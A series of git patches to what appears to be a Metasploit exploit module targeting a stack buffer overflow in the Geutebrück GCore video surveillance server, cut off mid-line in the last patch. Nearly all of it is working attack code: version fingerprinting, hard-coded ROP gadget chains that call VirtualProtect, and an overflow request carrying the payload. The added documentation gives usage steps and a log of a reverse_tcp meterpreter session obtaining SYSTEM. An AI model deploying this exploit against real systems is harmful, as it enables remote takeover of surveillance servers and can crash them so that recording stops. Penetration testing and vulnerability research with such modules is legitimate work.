indentation --- .../http/geutebrueck_gcore_x64_rce_bo.md | 63 +++ .../http/geutebrueck_gcore_x64_rce_bo.rb | 454 +++++++++--------- 2 files changed, 290 insertions(+), 227 deletions(-) create mode 100644 documentation/modules/exploit/windows/http/geutebrueck_gcore_x64_rce_bo.md diff --git a/documentation/modules/exploit/windows/http/geutebrueck_gcore_x64_rce_bo.md b/documentation/modules/exploit/windows/http/geutebrueck_gcore_x64_rce_bo.md new file mode 100644 index 0000000000..4aff5e18fb --- /dev/null +++ b/documentation/modules/exploit/windows/http/geutebrueck_gcore_x64_rce_bo.md @@ -0,0 +1,63 @@ +## Vulnerable Application + + Geutebrück GCore Server 1.3.8.42,1.4.2.37 are vulnerable to a buffer overflow exploitation. Since this application is started with system privileges this allows a system remote code execution. + +## Verification Steps + + 1. Install Windows as basic OS (Tested with Win2012R2,Windows 7) + 2. Install the Geutebrück GCore server + 3. Verify that http://:13003/statistics/runningmoduleslist.xml available is. + 4. Start msfconsole + 5. Do: ```use [exploit/windows/http/geutebrueck_gcore_x64_rce_bo]``` + 6. Do: ```set rhost ``` + 7. Do: ```set rport 13003`` + 8. Do: ```set payload windows/x64/meterpreter/reverse_tcp``` + 9. Do: ```exploit``` + 10. You should get a shell as NT/SYSTEM. + +## Scenarios +``` +msf exploit(geutebrueck_gcore_x64_rce_bo) > show options + +Module options (exploit/windows/http/geutebrueck_gcore_x64_rce_bo): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + RHOST 192.168.1.10 yes The target address + RPORT 13003 yes The target port + + + + Payload options (windows/x64/meterpreter/reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) + LHOST 192.168.1.11 yes The listen address + LPORT 4444 yes The listen port + + + Exploit target: + + Id Name + -- ---- + 0 Automatic Targeting + +msf exploit(geutebrueck_gcore_x64_rce_bo) > exploit + [*] Started reverse TCP handler on 192.168.1.11:4444 + [*] 192.168.1.10:13003 - Trying to fingerprint server with http://192.168.1.10:13003/statistics/runningmoduleslist.xml... + [*] 192.168.1.10:13003 - Vulnerable version detected: GCore 1.4.2.37, Windows x64 (Win7, Win8/8.1, Win2012R2,...) + [*] 192.168.1.10:13003 - Preparing ROP chain for target 1.4.2.37! + [*] 192.168.1.10:13003 - Crafting Exploit... + [*] 192.168.1.10:13003 - Exploit ready for sending... + [*] 192.168.1.10:13003 - Exploit sent! [*] Sending stage (1188415 bytes) to + [*] Meterpreter session 1 opened ( :4444 -> 49963) at 2017-11-03 13:14:51 +0200 + [*] 192.168.1.10:13003 - Closing socket. + meterpreter > getsystem + ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). + meterpreter > getuid Server username: + NT-AUTORITÄT\SYSTEM + meterpreter > +``` +## Mitigation +Geutebrück released a new Version and an update for the affected version which should be installed to fix the described vulnerabilities. diff --git a/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb b/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb index c3ebbd14b8..4fd1677713 100644 --- a/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb +++ b/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb @@ -7,279 +7,279 @@ require 'nokogiri' require 'open-uri' class MetasploitModule < Msf::Exploit::Remote - include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::Tcp - Rank = NormalRanking + Rank = NormalRanking - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Geutebrueck GCore - GCoreServer.exe Buffer Overflow RCE', - 'Description' => 'This module exploits a stack Buffer Overflow in the GCore server (GCoreServer.exe). The vulnerable webserver is running on Port 13003 and Port 13004, does not require authentication and affects all versions from 2003 till July 2016 (Version 1.4.YYYYY).', - 'License' => MSF_LICENSE, - 'Author' => - [ - 'Luca Cappiello', - 'Maurice Popp' - ], - 'References' => - [ - ['EDB','41153'], - ['URL','www.geutebrueck.com'] - ], - 'Platform' => 'win', - 'Targets' => - [ - ['Automatic Targeting', { 'auto' => true, 'Arch' => ARCH_X64 }], - ['GCore 1.3.8.42, Windows x64 (Win7, Win8/8.1, Win2012R2,...)', { 'Arch' => ARCH_X64}], - ['GCore 1.4.2.37, Windows x64 (Win7, Win8/8.1, Win2012R2,...)', { 'Arch' => ARCH_X64}] - ], - 'Payload' => - { - 'Space' => '2000' - }, - 'Privileged' => true, - 'DisclosureDate' => 'Jan 24 2017', - 'DefaultTarget' => 0)) + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Geutebrueck GCore - GCoreServer.exe Buffer Overflow RCE', + 'Description' => 'This module exploits a stack Buffer Overflow in the GCore server (GCoreServer.exe). The vulnerable webserver is running on Port 13003 and Port 13004, does not require authentication and affects all versions from 2003 till July 2016 (Version 1.4.YYYYY).', + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Luca Cappiello', + 'Maurice Popp' + ], + 'References' => + [ + ['EDB','41153'], + ['URL','www.geutebrueck.com'] + ], + 'Platform' => 'win', + 'Targets' => + [ + ['Automatic Targeting', { 'auto' => true, 'Arch' => ARCH_X64 }], + ['GCore 1.3.8.42, Windows x64 (Win7, Win8/8.1, Win2012R2,...)', { 'Arch' => ARCH_X64}], + ['GCore 1.4.2.37, Windows x64 (Win7, Win8/8.1, Win2012R2,...)', { 'Arch' => ARCH_X64}] + ], + 'Payload' => + { + 'Space' => '2000' + }, + 'Privileged' => true, + 'DisclosureDate' => 'Jan 24 2017', + 'DefaultTarget' => 0)) end def fingerprint - print_status('Trying to fingerprint server with http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml...') - @doc = Nokogiri::XML(open('http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml')) - statistics = @doc.css('modulestate') - statistics.each do |x| - if (x.to_s.include? 'GCoreServer') && (x.to_s.include? '1.3.8.42') - mytarget = targets[1] - print_status("Vulnerable version detected: #{mytarget.name}") - return Exploit::CheckCode::Appears, mytarget - elsif (x.to_s.include? 'GCoreServer') && (x.to_s.include? '1.4.2.37') - mytarget = targets[2] - print_status("Vulnerable version detected: #{mytarget.name}") - return Exploit::CheckCode::Appears, mytarget - end + print_status('Trying to fingerprint server with http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml...') + @doc = Nokogiri::XML(open('http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml')) + statistics = @doc.css('modulestate') + statistics.each do |x| + if (x.to_s.include? 'GCoreServer') && (x.to_s.include? '1.3.8.42') + mytarget = targets[1] + print_status("Vulnerable version detected: #{mytarget.name}") + return Exploit::CheckCode::Appears, mytarget + elsif (x.to_s.include? 'GCoreServer') && (x.to_s.include? '1.4.2.37') + mytarget = targets[2] + print_status("Vulnerable version detected: #{mytarget.name}") + return Exploit::CheckCode::Appears, mytarget end - print_status('Statistics Page under http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml is not available.') - print_status("Make sure that you know the exact version, otherwise you'll knock out the service.") - print_status('In the default configuration the service will restart after 1 minute and after the third crash the server will reboot!') - print_status('After a crash, the videosurveillance system can not recover properly and stops recording.') - [Exploit::CheckCode::Unknown, nil] + end + print_status('Statistics Page under http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml is not available.') + print_status("Make sure that you know the exact version, otherwise you'll knock out the service.") + print_status('In the default configuration the service will restart after 1 minute and after the third crash the server will reboot!') + print_status('After a crash, the videosurveillance system can not recover properly and stops recording.') + [Exploit::CheckCode::Unknown, nil] end def check - fingerprint + fingerprint end def ropchain(target) - if target.name.include? '1.3.8.42' - print_status('Preparing ROP chain for target 1.3.8.42!') + if target.name.include? '1.3.8.42' + print_status('Preparing ROP chain for target 1.3.8.42!') - # 0x140cd00a9 | add rsp, 0x10 ; ret - # This is needed because the next 16 bytes are sometimes messed up. - overwrite = [0x140cd00a9].pack('Q<') + # 0x140cd00a9 | add rsp, 0x10 ; ret + # This is needed because the next 16 bytes are sometimes messed up. + overwrite = [0x140cd00a9].pack('Q<') - # These bytes "\x43" are sacrificed ; we align the stack to jump over this messed up crap. - stack_align = "\x43" * 16 + # These bytes "\x43" are sacrificed ; we align the stack to jump over this messed up crap. + stack_align = "\x43" * 16 - # We have 40 bytes left to align our stack! - # The most reliable way to align our stack is to save the value of rsp in another register, do some calculations - # and to restore it. - # We save RSP to RDX. Even if we use ESP/EDX registers in the instruction, it still works because the values are small enough. + # We have 40 bytes left to align our stack! + # The most reliable way to align our stack is to save the value of rsp in another register, do some calculations + # and to restore it. + # We save RSP to RDX. Even if we use ESP/EDX registers in the instruction, it still works because the values are small enough. - # 0x1404e5cbf: mov edx, esp ; ret - stack_align += [0x1404e5cbf].pack('Q<') + # 0x1404e5cbf: mov edx, esp ; ret + stack_align += [0x1404e5cbf].pack('Q<') - # As no useful "sub rdx, xxx" or "sub rsp, xxx" gadget were found, we use the add instruction with a negative value. - # We pop -XXXXX as \xxxxxxxxx to rax - # 0x14013db94 pop rax ; ret - stack_align += [0x14013db94].pack('Q<') - stack_align += [0xFFFFFFFFFFFFF061].pack('Q<') + # As no useful "sub rdx, xxx" or "sub rsp, xxx" gadget were found, we use the add instruction with a negative value. + # We pop -XXXXX as \xxxxxxxxx to rax + # 0x14013db94 pop rax ; ret + stack_align += [0x14013db94].pack('Q<') + stack_align += [0xFFFFFFFFFFFFF061].pack('Q<') - # Our value is enough. - # 0x1407dc547 | add rax,rdx ; ret - stack_align += [0x1407dc547].pack('Q<') + # Our value is enough. + # 0x1407dc547 | add rax,rdx ; ret + stack_align += [0x1407dc547].pack('Q<') - # RSP gets restored with the new value. The return instruction doesn't break our ropchain and continues -XXXXX back. - # 0x140ce9ac0 | mov rsp, rax ; ..... ; ret - stack_align += [0x140ce9ac0].pack('Q<') + # RSP gets restored with the new value. The return instruction doesn't break our ropchain and continues -XXXXX back. + # 0x140ce9ac0 | mov rsp, rax ; ..... ; ret + stack_align += [0x140ce9ac0].pack('Q<') - # Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9. - # We want RCX to hold the value for VP Argument "Address of Shellcode" - # 0x140cc2234 | mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret ; - rop = '' - rop += [0x140cc2234].pack('Q<') - rop += [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ; - # 0x1400ae2ae | POP RDX; RETN - # 0x...1000 | Value for VP "Size of Memory" - rop += [0x1400ae2ae].pack('Q<') - rop += [0x0000000000000400].pack('Q<') + # Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9. + # We want RCX to hold the value for VP Argument "Address of Shellcode" + # 0x140cc2234 | mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret ; + rop = '' + rop += [0x140cc2234].pack('Q<') + rop += [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ; + # 0x1400ae2ae | POP RDX; RETN + # 0x...1000 | Value for VP "Size of Memory" + rop += [0x1400ae2ae].pack('Q<') + rop += [0x0000000000000400].pack('Q<') - # 0x14029dc6e: | POP R8; RET - # 0x...40 | Value for VP "Execute Permissions" - rop += [0x14029dc6e].pack('Q<') - rop += [0x0000000000000040].pack('Q<') + # 0x14029dc6e: | POP R8; RET + # 0x...40 | Value for VP "Execute Permissions" + rop += [0x14029dc6e].pack('Q<') + rop += [0x0000000000000040].pack('Q<') - # 0x1400aa030 | POP R9; RET - # 0x1409AE1A8 is the .data section of gcore - rop += [0x1400aa030].pack('Q<') - rop += [0x1409AE1A8].pack('Q<') + # 0x1400aa030 | POP R9; RET + # 0x1409AE1A8 is the .data section of gcore + rop += [0x1400aa030].pack('Q<') + rop += [0x1409AE1A8].pack('Q<') - # 0x140b5927a: xor rax, rax ; ret - rop += [0x140b5927a].pack('Q<') + # 0x140b5927a: xor rax, rax ; ret + rop += [0x140b5927a].pack('Q<') - # 0x1402ce220 pop rax ; ret - # 0x140d752b8 | VP Stub IAT Entry - rop += [0x1402ce220].pack('Q<') - rop += [0x140d752b8].pack('Q<') + # 0x1402ce220 pop rax ; ret + # 0x140d752b8 | VP Stub IAT Entry + rop += [0x1402ce220].pack('Q<') + rop += [0x140d752b8].pack('Q<') - # 0x1407c6b3b mov rax, qword [rax] ; ret ; - rop += [0x1407c6b3b].pack('Q<') + # 0x1407c6b3b mov rax, qword [rax] ; ret ; + rop += [0x1407c6b3b].pack('Q<') - # 0x140989c41 push rax; ret - rop += [0x140989c41].pack('Q<') + # 0x140989c41 push rax; ret + rop += [0x140989c41].pack('Q<') - # 0x1406d684d jmp rsp - rop += [0x1406d684d].pack('Q<') + # 0x1406d684d jmp rsp + rop += [0x1406d684d].pack('Q<') - [rop, overwrite, stack_align] + [rop, overwrite, stack_align] - elsif target.name.include? '1.4.2.37' - print_status('Preparing ROP chain for target 1.4.2.37!') + elsif target.name.include? '1.4.2.37' + print_status('Preparing ROP chain for target 1.4.2.37!') - # 0x140cd9759 | add rsp, 0x10 ; ret - # This is needed because the next 16 bytes are sometimes messed up. - overwrite = [0x140cd9759].pack('Q<') + # 0x140cd9759 | add rsp, 0x10 ; ret + # This is needed because the next 16 bytes are sometimes messed up. + overwrite = [0x140cd9759].pack('Q<') - # These bytes "\x43" are sacrificed ; we align the stack to jump over this. - stack_align = "\x43" * 16 + # These bytes "\x43" are sacrificed ; we align the stack to jump over this. + stack_align = "\x43" * 16 - # We have 40 bytes left to align our stack! - # The most reliable way to align our stack is to save the value of rsp in another register, do some calculations - # and to restore it. - # We save RSP to RDX. Even if we use ESP/EDX registers in the instruction, it still works because the values are small enough. + # We have 40 bytes left to align our stack! + # The most reliable way to align our stack is to save the value of rsp in another register, do some calculations + # and to restore it. + # We save RSP to RDX. Even if we use ESP/EDX registers in the instruction, it still works because the values are small enough. - # 0x1404f213f: mov edx, esp ; ret - stack_align += [0x1404f213f].pack('Q<') + # 0x1404f213f: mov edx, esp ; ret + stack_align += [0x1404f213f].pack('Q<') - # As no useful "sub rdx, xxx" or "sub rsp, xxx" gadget were found, we use the add instruction with a negative value. - # We pop -XXXXX as \xxxxxxxxx to rax - # 0x14000efa8 pop rax ; ret - stack_align += [0x14000efa8].pack('Q<') - stack_align += [0xFFFFFFFFFFFFF061].pack('Q<') + # As no useful "sub rdx, xxx" or "sub rsp, xxx" gadget were found, we use the add instruction with a negative value. + # We pop -XXXXX as \xxxxxxxxx to rax + # 0x14000efa8 pop rax ; ret + stack_align += [0x14000efa8].pack('Q<') + stack_align += [0xFFFFFFFFFFFFF061].pack('Q<') - # Our value is enough. - # 0x140cdfe65 | add rax,rdx ; ret - stack_align += [0x140cdfe65].pack('Q<') + # Our value is enough. + # 0x140cdfe65 | add rax,rdx ; ret + stack_align += [0x140cdfe65].pack('Q<') - # RSP gets restored with the new value. The return instruction doesn't break our ropchain and continues -XXXXX back. - # 0x140cf3110 | mov rsp, rax ; ..... ; ret - stack_align += [0x140cf3110].pack('Q<') + # RSP gets restored with the new value. The return instruction doesn't break our ropchain and continues -XXXXX back. + # 0x140cf3110 | mov rsp, rax ; ..... ; ret + stack_align += [0x140cf3110].pack('Q<') - # Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9. - # We want RCX to hold the value for VP Argument "Address of Shellcode" - # 0x140ccb984 | mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret ; - rop = '' - rop += [0x140ccb984].pack('Q<') - rop += [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ; - # 0x14008f7ec | POP RDX; RETN - # 0x...1000 | Value for VP "Size of Memory" - rop += [0x14008f7ec].pack('Q<') - rop += [0x0000000000000400].pack('Q<') + # Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9. + # We want RCX to hold the value for VP Argument "Address of Shellcode" + # 0x140ccb984 | mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret ; + rop = '' + rop += [0x140ccb984].pack('Q<') + rop += [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ; + # 0x14008f7ec | POP RDX; RETN + # 0x...1000 | Value for VP "Size of Memory" + rop += [0x14008f7ec].pack('Q<') + rop += [0x0000000000000400].pack('Q<') - # 0x140a88f81: | POP R8; RET - # 0x...40 | Value for VP "Execute Permissions" - rop += [0x140a88f81].pack('Q<') - rop += [0x0000000000000040].pack('Q<') + # 0x140a88f81: | POP R8; RET + # 0x...40 | Value for VP "Execute Permissions" + rop += [0x140a88f81].pack('Q<') + rop += [0x0000000000000040].pack('Q<') - # 0x1400aa030 | POP R9; RET - # 0x... | Value for VP "Writeable location". Not sure if needed? - # 0x140FB5000 is the .data section of gcore; let's test with this writable section... - rop += [0x1400aa030].pack('Q<') - rop += [0x140FB5000].pack('Q<') + # 0x1400aa030 | POP R9; RET + # 0x... | Value for VP "Writeable location". Not sure if needed? + # 0x140FB5000 is the .data section of gcore; let's test with this writable section... + rop += [0x1400aa030].pack('Q<') + rop += [0x140FB5000].pack('Q<') - # 0x140ccea2f: xor rax, rax ; et - rop += [0x140ccea2f].pack('Q<') + # 0x140ccea2f: xor rax, rax ; et + rop += [0x140ccea2f].pack('Q<') - # 0x14000efa8 pop rax ; ret - # 0x140d83268 | VP Stub IAT Entry - rop += [0x14000efa8].pack('Q<') - rop += [0x140d83268].pack('Q<') + # 0x14000efa8 pop rax ; ret + # 0x140d83268 | VP Stub IAT Entry + rop += [0x14000efa8].pack('Q<') + rop += [0x140d83268].pack('Q<') - # 0x14095b254 mov rax, qword [rax] ; ret ; - rop += [0x14095b254].pack('Q<') + # 0x14095b254 mov rax, qword [rax] ; ret ; + rop += [0x14095b254].pack('Q<') - # 0x140166c46 push rax; ret - rop += [0x140166c46].pack('Q<') + # 0x140166c46 push rax; ret + rop += [0x140166c46].pack('Q<') - # 0x140cfb98d jmp rsp - rop += [0x140cfb98d].pack('Q<') + # 0x140cfb98d jmp rsp + rop += [0x140cfb98d].pack('Q<') - [rop, overwrite, stack_align] + [rop, overwrite, stack_align] - else - print_status('ROP chain for this version not (yet) available or the target is not vulnerable.') - - end - end - - def exploit - if target['auto'] - checkcode, target = fingerprint - if checkcode.to_s.include? 'unknown' - print_status('No vulnerable Version detected - exploit aborted.') - else - target_rop, target_overwrite, target_stack_align = ropchain(target) - begin - connect - print_status('Crafting Exploit...') - - http_req = 'GET /' - buffer_200 = "\x41" * 200 - rop = target_rop - payload.encoded - buffer_1823 = "\x41" * 1823 - overwrite = target_overwrite - stack_align = target_stack_align - - exploit = http_req + buffer_200 + rop + payload.encoded + buffer_1823 + overwrite + stack_align - print_status('Exploit ready for sending...') - sock.put(exploit, 'Timeout' => 20) - print_status('Exploit sent!') - buf = sock.get_once || '' - rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e - elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") - ensure - print_status('Closing socket.') - disconnect - end - end - - else - print_status('No auto detection - be sure to choose the right version! Otherwise the service will crash, the system reboots and leaves the surveillance software in an undefined status.') - print_status("Selected version: #{self.target.name}") - target_rop, target_overwrite, target_stack_align = ropchain(self.target) - begin - connect - print_status('Crafting Exploit...') - - http_req = 'GET /' - buffer_200 = "\x41" * 200 - rop = target_rop - payload.encoded - buffer_1823 = "\x41" * 1823 - overwrite = target_overwrite - stack_align = target_stack_align - - exploit = http_req + buffer_200 + rop + payload.encoded + buffer_1823 + overwrite + stack_align - print_status('Exploit ready for sending...') - sock.put(exploit, 'Timeout' => 20) - print_status('Exploit sent!') - buf = sock.get_once || '' - rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e - elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") - ensure - print_status('Closing socket.') - disconnect - end + else + print_status('ROP chain for this version not (yet) available or the target is not vulnerable.') end end -end + + def exploit + if target['auto'] + checkcode, target = fingerprint + if checkcode.to_s.include? 'unknown' + print_status('No vulnerable Version detected - exploit aborted.') + else + target_rop, target_overwrite, target_stack_align = ropchain(target) + begin + connect + print_status('Crafting Exploit...') + + http_req = 'GET /' + buffer_200 = "\x41" * 200 + rop = target_rop + payload.encoded + buffer_1823 = "\x41" * 1823 + overwrite = target_overwrite + stack_align = target_stack_align + + exploit = http_req + buffer_200 + rop + payload.encoded + buffer_1823 + overwrite + stack_align + print_status('Exploit ready for sending...') + sock.put(exploit, 'Timeout' => 20) + print_status('Exploit sent!') + buf = sock.get_once || '' + rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e + elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") + ensure + print_status('Closing socket.') + disconnect + end + end + + else + print_status('No auto detection - be sure to choose the right version! Otherwise the service will crash, the system reboots and leaves the surveillance software in an undefined status.') + print_status("Selected version: #{self.target.name}") + target_rop, target_overwrite, target_stack_align = ropchain(self.target) + begin + connect + print_status('Crafting Exploit...') + + http_req = 'GET /' + buffer_200 = "\x41" * 200 + rop = target_rop + payload.encoded + buffer_1823 = "\x41" * 1823 + overwrite = target_overwrite + stack_align = target_stack_align + + exploit = http_req + buffer_200 + rop + payload.encoded + buffer_1823 + overwrite + stack_align + print_status('Exploit ready for sending...') + sock.put(exploit, 'Timeout' => 20) + print_status('Exploit sent!') + buf = sock.get_once || '' + rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e + elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") + ensure + print_status('Closing socket.') + disconnect + end + + end + end + end From 7fe750422edc9f17dfb2f90f0583a43bca8f238d Mon Sep 17 00:00:00 2001 From: M4P0 Date: Fri, 6 Oct 2017 15:41:12 +0200 Subject: [PATCH 019/254] Update geutebrueck_gcore_x64_rce_bo.md --- .../exploit/windows/http/geutebrueck_gcore_x64_rce_bo.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/documentation/modules/exploit/windows/http/geutebrueck_gcore_x64_rce_bo.md b/documentation/modules/exploit/windows/http/geutebrueck_gcore_x64_rce_bo.md index 4aff5e18fb..895d792d03 100644 --- a/documentation/modules/exploit/windows/http/geutebrueck_gcore_x64_rce_bo.md +++ b/documentation/modules/exploit/windows/http/geutebrueck_gcore_x64_rce_bo.md @@ -10,7 +10,7 @@ 4. Start msfconsole 5. Do: ```use [exploit/windows/http/geutebrueck_gcore_x64_rce_bo]``` 6. Do: ```set rhost ``` - 7. Do: ```set rport 13003`` + 7. Do: ```set rport 13003``` 8. Do: ```set payload windows/x64/meterpreter/reverse_tcp``` 9. Do: ```exploit``` 10. You should get a shell as NT/SYSTEM. @@ -60,4 +60,4 @@ msf exploit(geutebrueck_gcore_x64_rce_bo) > exploit meterpreter > ``` ## Mitigation -Geutebrück released a new Version and an update for the affected version which should be installed to fix the described vulnerabilities. +Geutebrück released a new version and an update for the affected product which should be installed to fix the described vulnerabilities. From 8d50c34e4bc702ace1cfea77481ff62634868048 Mon Sep 17 00:00:00 2001 From: Maurice Popp Date: Sat, 7 Oct 2017 14:06:58 +0200 Subject: [PATCH 020/254] codefixing --- .../http/geutebrueck_gcore_x64_rce_bo.rb | 334 ++++++++---------- 1 file changed, 156 insertions(+), 178 deletions(-) diff --git a/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb b/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb index 4fd1677713..3e621f2858 100644 --- a/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb +++ b/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb @@ -40,197 +40,205 @@ class MetasploitModule < Msf::Exploit::Remote 'Privileged' => true, 'DisclosureDate' => 'Jan 24 2017', 'DefaultTarget' => 0)) - end - def fingerprint - print_status('Trying to fingerprint server with http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml...') - @doc = Nokogiri::XML(open('http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml')) - statistics = @doc.css('modulestate') - statistics.each do |x| - if (x.to_s.include? 'GCoreServer') && (x.to_s.include? '1.3.8.42') - mytarget = targets[1] - print_status("Vulnerable version detected: #{mytarget.name}") - return Exploit::CheckCode::Appears, mytarget - elsif (x.to_s.include? 'GCoreServer') && (x.to_s.include? '1.4.2.37') - mytarget = targets[2] - print_status("Vulnerable version detected: #{mytarget.name}") - return Exploit::CheckCode::Appears, mytarget + register_options( + [ + Opt::RPORT(13003) + ]) end - end - print_status('Statistics Page under http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + '/statistics/runningmoduleslist.xml is not available.') - print_status("Make sure that you know the exact version, otherwise you'll knock out the service.") - print_status('In the default configuration the service will restart after 1 minute and after the third crash the server will reboot!') - print_status('After a crash, the videosurveillance system can not recover properly and stops recording.') - [Exploit::CheckCode::Unknown, nil] - end - def check - fingerprint - end + def fingerprint + print_status("Trying to fingerprint server with http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml...") + @doc = Nokogiri::XML(open("http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml")) + statistics = @doc.css('modulestate') + statistics.each do |x| + if (x.to_s.include? 'GCoreServer') && (x.to_s.include? '1.3.8.42') + mytarget = targets[1] + print_status("Vulnerable version detected: #{mytarget.name}") + return Exploit::CheckCode::Appears, mytarget + elsif (x.to_s.include? 'GCoreServer') && (x.to_s.include? '1.4.2.37') + mytarget = targets[2] + print_status("Vulnerable version detected: #{mytarget.name}") + return Exploit::CheckCode::Appears, mytarget + end + end + print_status("Statistics Page under http://#{datastore['RHOST']}:#{datastore['RPORT']}/statistics/runningmoduleslist.xml is not available.") + print_status('Make sure that you know the exact version, otherwise you\'ll knock out the service.') + print_status('In the default configuration the service will restart after 1 minute and after the third crash the server will reboot!') + print_status('After a crash, the videosurveillance system can not recover properly and stops recording.') + [Exploit::CheckCode::Unknown, nil] + end - def ropchain(target) - if target.name.include? '1.3.8.42' - print_status('Preparing ROP chain for target 1.3.8.42!') + def check + fingerprint + end - # 0x140cd00a9 | add rsp, 0x10 ; ret - # This is needed because the next 16 bytes are sometimes messed up. - overwrite = [0x140cd00a9].pack('Q<') + def ropchain(target) + if target.name.include? '1.3.8.42' + print_status('Preparing ROP chain for target 1.3.8.42!') - # These bytes "\x43" are sacrificed ; we align the stack to jump over this messed up crap. - stack_align = "\x43" * 16 + # 0x140cd00a9 | add rsp, 0x10 ; ret + # This is needed because the next 16 bytes are sometimes messed up. + overwrite = [0x140cd00a9].pack('Q<') - # We have 40 bytes left to align our stack! - # The most reliable way to align our stack is to save the value of rsp in another register, do some calculations - # and to restore it. - # We save RSP to RDX. Even if we use ESP/EDX registers in the instruction, it still works because the values are small enough. + # These bytes "\x43" are sacrificed ; we align the stack to jump over this messed up crap. + stack_align = "\x43" * 16 - # 0x1404e5cbf: mov edx, esp ; ret - stack_align += [0x1404e5cbf].pack('Q<') + # We have 40 bytes left to align our stack! + # The most reliable way to align our stack is to save the value of rsp in another register, do some calculations + # and to restore it. + # We save RSP to RDX. Even if we use ESP/EDX registers in the instruction, it still works because the values are small enough. - # As no useful "sub rdx, xxx" or "sub rsp, xxx" gadget were found, we use the add instruction with a negative value. - # We pop -XXXXX as \xxxxxxxxx to rax - # 0x14013db94 pop rax ; ret - stack_align += [0x14013db94].pack('Q<') - stack_align += [0xFFFFFFFFFFFFF061].pack('Q<') + # 0x1404e5cbf: mov edx, esp ; ret + stack_align += [0x1404e5cbf].pack('Q<') - # Our value is enough. - # 0x1407dc547 | add rax,rdx ; ret - stack_align += [0x1407dc547].pack('Q<') + # As no useful "sub rdx, xxx" or "sub rsp, xxx" gadget were found, we use the add instruction with a negative value. + # We pop -XXXXX as \xxxxxxxxx to rax + # 0x14013db94 pop rax ; ret + stack_align += [0x14013db94].pack('Q<') + stack_align += [0xFFFFFFFFFFFFF061].pack('Q<') - # RSP gets restored with the new value. The return instruction doesn't break our ropchain and continues -XXXXX back. - # 0x140ce9ac0 | mov rsp, rax ; ..... ; ret - stack_align += [0x140ce9ac0].pack('Q<') + # Our value is enough. + # 0x1407dc547 | add rax,rdx ; ret + stack_align += [0x1407dc547].pack('Q<') - # Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9. - # We want RCX to hold the value for VP Argument "Address of Shellcode" - # 0x140cc2234 | mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret ; - rop = '' - rop += [0x140cc2234].pack('Q<') - rop += [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ; - # 0x1400ae2ae | POP RDX; RETN - # 0x...1000 | Value for VP "Size of Memory" - rop += [0x1400ae2ae].pack('Q<') - rop += [0x0000000000000400].pack('Q<') + # RSP gets restored with the new value. The return instruction doesn't break our ropchain and continues -XXXXX back. + # 0x140ce9ac0 | mov rsp, rax ; ..... ; ret + stack_align += [0x140ce9ac0].pack('Q<') - # 0x14029dc6e: | POP R8; RET - # 0x...40 | Value for VP "Execute Permissions" - rop += 